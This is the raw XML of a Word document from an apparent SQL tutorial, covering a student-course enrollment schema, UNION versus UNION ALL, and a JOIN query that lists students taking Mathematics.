          <w:p w14:paraId="64975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r w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="1BEDD4F4" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EC3E9B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5CE90EA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mputer Networks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73E417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asics of networking and protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="105FB2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 months</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42463F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0E0F5874"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059D784">
          <v:rect id="_x0000_i3272" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC11C6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Enrollments Table:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746A7E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is used to represent the many-to-many relationship between students and courses. Each student can enroll in multiple courses, and each course can have multiple students enrolled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3487607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88C879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Enrollments (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523A0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 Foreign key referencing the student</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BDCEF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 Foreign key referencing the course</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB8C2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enrolled in the course</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1139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rade VARCHAR(2),                      -- Grade of the student in the course</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D77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   -- Composite primary key to ensure a student can only be enrolled once in a course</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0A91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student_id) REFERENCES Students(student_id),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4684AB5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course_id) REFERENCES Courses(course_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AACFEB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09B5A15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47"/>
        <w:gridCol w:w="1601"/>
        <w:gridCol w:w="595"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="2F164E08" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17FAF95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123C79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34FC46D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4D3616D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rade</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="441B0E40" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05BC574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6D3E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6B10CE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1-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7ED172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r w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="0ADAD97B" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CFE8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914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009198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2-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CA4D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r>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="783B5919" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08D5F4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1321757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05A3785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12-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B4CB15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bl>
    <w:p w14:paraId="17D60AD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1ADAEEE">
          <v:rect id="_x0000_i3273" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="096AD6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How the Schema Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B620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Stores basic information about the students like their names, email, and contact details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001699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Stores the information about the courses available, including course names, descriptions, durations, and the number of credits awarded upon completion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E068D0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nrollments Table</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Represents the many-to-many relationship between students and courses. Each row in this table links a student to a course and records additional information like the enrollment date and grade.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5C41B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Queries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5310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To get all courses a student is enrolled in:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAE0A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course_name, c.course_description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D862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Courses c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12502B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c.course_id = e.course_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289ADA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AA43C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To get all students enrolled in a specific course:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F84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first_name, s.last_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F5900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s s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA2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s.student_id = e.student_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029FEA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course_id = 101;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C020A2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o get the grade of a student in a specific course:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054C93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grade</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C82B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nrollments e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3DA1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 AND e.course_id = 101;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1679683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F1CC157">
          <v:rect id="_x0000_i3274" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA020D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C195CB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Holds the student’s personal information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74065B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Holds the details of available courses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FE9A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Connects students with the courses they are enrolled in, while also storing additional data such as the enrollment date and grade.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C84A360"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This database schema allows you to store and query student-course relationships efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2827B551" w14:textId="44300AA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3275" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDF5696" w14:textId="3FC760A9" w:rsidR="00380657" w:rsidRPr="00CE4B95" w:rsidRDefault="00356F93">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="797" w:name="_Toc197868011"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is UNION ALL</w:t>
      </w:r>
      <w:r w:rsidR="00380657" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="797"/>
    </w:p>
    <w:p w14:paraId="3647EDFB" w14:textId="48755EFD" w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w:rsidRDefault="00BD197A" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>UNION ALL in SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0081974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3E0B2E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4E162AE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1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4377F6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6C3B0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2FFD1B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2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C024C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F3177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s all rows</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: UNION ALL includes duplicate rows in the result set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CF925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aster than UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since it doesn’t have to check for and remove duplicates, UNION ALL is generally faster than UNION.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012D79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lumn Matching</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The columns in each SELECT statement must have the same number and compatible data types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A7A7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 Sorting or Distinct Check</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It does not sort the result set or remove duplicates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D6E81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99291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you have two tables, Employee_US and Employee_India, and you want to combine their employee lists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E1B89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341833E8" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C74842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CFF99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4A048D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6D1823D" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F8C1B2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5CFA99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14D191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741D31F" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E7E31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A4E5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29FF03C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734D2B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F0B939F" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="728D5BA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402DB6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CA708D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2B50D57C" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A2B217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3B093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81290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05C92CF" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="571AC9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39C013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18B845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A790E8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012E35B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64CF98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FROM Employee_US</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2AA81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E7E96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94E5C1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2E2EC3A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4EBD91E" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5313CD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9D0FB0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13A4EC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346ABFA1" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76F524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58CAC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0D4F2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6AD87DD" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E464F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A5AC98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7F114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7BCC4990" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A41F6B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FA189C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432EF7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26D97AF" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="672F14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1434F7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4EFD9C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716109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all rows from both tables are included in the result, even if they are duplicates (though in this example, there are no duplicates).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AF1BE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ifference Between UNION and UNION ALL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CE3E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Combines the result sets and removes duplicate rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D46E0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Combines the result sets and keeps all rows, including duplicates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6310A90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Duplicate Rows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11306E7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77F72BE7" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A0BBD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7F72B12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E02A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845327" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="605C3E9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DDB1D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A0492E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172C0491" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B76D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85360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619E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0EB7FDC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2EA810B3" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4390741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17C38A2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4397B9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F72DF7" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="009567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EB3C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51E804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42BA7DA6" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41AB3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F877A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B65FD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0773300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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69067D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9179B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59A6B6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6BA896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9D9E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62C9A19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69F52FAD" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C4868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0EF4FB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7D177F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5422A525" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E32E8F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2206C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0E4C9E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317D95E" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50266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B75268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85515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2B16CD98" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04FAD13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5387A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02C06C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4DA0D6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5C40CF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77A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32388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C959E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2FB33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0A0625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26CABE7" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28E8390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FE17B6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38488D9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754822A4" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E0B92C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D0B09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B6538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0EC0365D" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B65DA9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3D8004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339E2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419DDB5" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EF242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EF7F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B587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5711DD95" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F5B32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8B52E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39BE5D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636E7A9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2060D38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is used to combine result sets without removing duplicates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA0E85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 is faster than UNION because it does not perform the duplicate-checking operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFC236E" w14:textId="057411B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3276" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7AD81A" w14:textId="026CA2D9" w:rsidR="00CD0AFF" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD0AFF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="798" w:name="_Toc197868012"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidR="00BD197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D197A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>- D</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>isplay a list of students which have a Mathematics subject?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="798"/>
    </w:p>
    <w:p w14:paraId="36C14FB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nput - Student</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311BD308"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id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137BB28D"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name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7D7A22"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67C3129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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41ACF31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22F670BB"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name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D5FCB1" w14:textId="634F7253" w:rsidR="00380657"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Where subject=Mathematics</w:t>
      </w:r>
      <w:r w:rsidR="00380657" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1EA650" w14:textId="747764BA" w:rsidR="006A176B" w:rsidRPr="005C1C9E" w:rsidRDefault="006A176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display a list of students who have the subject "Mathematics", you would need to perform a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operation between the Student table and the Subject table based on the Subject_id. Then, you would filter the results by checking if the Subject_name is "Mathematics".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DF43D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713AAE2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7338E616"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ELECT s.student_id, s.student_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DFD00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 s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3B937F"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IN Subject sub ON s.Subject_id = sub.subject_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219666E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WHERE sub.Subject_name = 'Mathematics';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F55D0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5CFF354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JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: We join the Student table (s) and the Subject table (sub) using the Subject_id field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45ABCD2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w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: We filter the results to only include rows where the Subject_name is "Mathematics".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEAC56F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA512D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392"/>
        <w:gridCol w:w="1033"/>
      </w:tblGrid>
      <w:tr w:rsidR="006A176B" w:rsidRPr="005C1C9E" w14:paraId="6FAC344E" w14:textId="77777777" w:rsidTr="006A176B">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16D14C2E"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76643469"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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D3B86B8"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r>
      <w:tr w:rsidR="006A176B" w:rsidRPr="005C1C9E" w14:paraId="6C64F2DB" w14:textId="77777777" w:rsidTr="006A176B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
